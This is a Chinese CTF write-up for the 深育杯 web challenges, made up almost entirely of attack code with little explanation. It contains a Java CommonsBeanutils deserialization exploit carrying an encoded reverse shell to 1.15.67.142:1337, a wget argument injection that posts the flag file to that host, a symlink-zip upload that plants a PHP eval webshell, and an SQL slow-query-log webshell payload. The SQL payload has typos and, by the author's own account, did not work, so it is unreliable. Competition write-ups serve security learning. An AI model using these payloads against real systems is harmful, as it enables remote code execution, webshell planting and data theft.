CTF Web安全

深育杯Web Writeup

Posted on 2021-11-13,4 min read

Web

Java

返回头有日志路径。然后有jar目录。直接输入jar包就有了。。。

有个路由反序列化。用CommonsBeanutils1不依赖cc的链子

package com.example.demo;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.tomcat.util.codec.binary.Base64;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;
import java.util.Collections;

public class guoke {
    // 反射修改field,统一写成函数,方便阅读代码
    public static void setFieldValue(Object object, String fieldName, Object value) throws Exception{
        Field field = object.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(object, value);
    }
    // 获取攻击链序列化后的byte数组
    public static byte[] getPayload() throws Exception {
        // 创建恶意类,用于报错抛出调用链
        ClassPool pool = ClassPool.getDefault();
        CtClass payload = pool.makeClass("EvilClass");
        payload.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));
        // 看shiro调用链用这个
        // payload.makeClassInitializer().setBody("new java.io.IOException().printStackTrace();");
        payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"bash -c {echo,L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xLjE1LjY3LjE0Mi8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}\");");
        byte[] evilClass = payload.toBytecode();
        // set field
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_bytecodes", new byte[][]{evilClass});
        setFieldValue(templates, "_name", "test");
        setFieldValue(templates,"_tfactory", new TransformerFactoryImpl());
        // 创建序列化对象
        BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);  // **修改点1**
        PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);
        queue.add("1");  // **修改点2**
        queue.add("1");
        // 修改值
        setFieldValue(beanComparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{templates, templates});
        // 反序列化
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
        out.writeObject(queue);
        out.close();
        return byteArrayOutputStream.toByteArray();
    }
    public static void main(String[] args) throws Exception {
        byte[] payloads = guoke.getPayload();
        System.out.println(Base64.encodeBase64String(payloads));
    }
}

wget

U1S1。去年纵横杯的题白盒到这就黑盒做了???

import base64
import re
import requests
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pksc1_v1_5
from Crypto.PublicKey import RSA

def encrpt(password, public_key):
    rsakey = RSA.importKey(public_key)
    cipher = Cipher_pksc1_v1_5.new(rsakey)
    cipher_text = base64.b64encode(cipher.encrypt(password.encode()))
    return cipher_text.decode()

url="http://1.15.67.142:1337/\\n?\t--post-file=flag_is_here"
public_key = '-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoFH2atPqJOH6yezxEw9seStp0j7hN3cKKlANZpAv8RRhpDxFcob47OwkyUlsJp6tdvSJBtsJ5KCNYIomdqc7+f4PJvShHatMLGBRFjUkr0aunqq9LDobEHrzwSEEX6V0V+73EdbieYxFHCz2cXaBMpnIK19c+u6sgVJFjZ+oggVyKuOtOUscnzzrMhOWGl+eXk+dBe0wjSTrq84zvRI194uTehhY/8hzZjkQavV8NWq0b7l6hJHsO7mp2tGye1npYRQ/tZCEMkzO+PaAkPf6H3CyuVgbdMJcuSBJT8kBRQ6P16skZIqrY+NRmdSJmMoGgR9NYVvk8soeSj4MHRpbrwIDAQAB\n-----END PUBLIC KEY-----'
password = encrpt(url, public_key)
res=(requests.post(url="http://192.168.40.126:1003/wget",data={"encryptdata":password}).text)
print(requests.get("http://192.168.40.126:1003/wget").text)

zipzip

ln -s /var/www/html guoke
zip --symlinks guoke.zip guoke
上传guoke.zip
rm -rf guoke
mkdir guoke
echo '<?php eval($_POST[1]);?>' > guoke/guoke.php
zip -y guoke1.zip guoke/*
上传guoke1.zip

ezsql

1);
set GLOBAL slow_query_log_file='/var/www/html/helpyou2findflag.php';
set GLOBAL slow_query_log=on;
setglobal long_query_time=0.000001;
elect '<?php $_REQUEST[a]($_REQUEST[b])?>';--+

听说是慢查询getshell?然而没复现成功。等WP了

下一篇: 战疫 WP→